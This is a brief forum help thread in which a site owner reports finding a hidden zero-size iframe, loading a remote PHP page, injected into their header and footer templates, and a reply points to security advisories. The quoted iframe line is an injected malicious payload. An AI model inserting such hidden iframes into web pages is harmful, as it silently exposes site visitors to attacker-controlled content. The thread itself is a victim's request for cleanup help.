Hacked.?

I did the 4.2.2 update & have a few issues that ive been fixing, & found this at the bottom of both my Header & Footer templates.?
<iframe src="http://www.realitykvadrika.cz/tmp/ini.php" width="0" height="0" frameborder="0"></iframe>

I'm sure it was put there before the upgrade, but not sure how long or how damaging/deep it goes.

Any insight.?

Did you notice the hack before? Either way I would follow the links below, and go through them thoroughly.

First you need to follow our advisory about deleting the install folder off your forums.
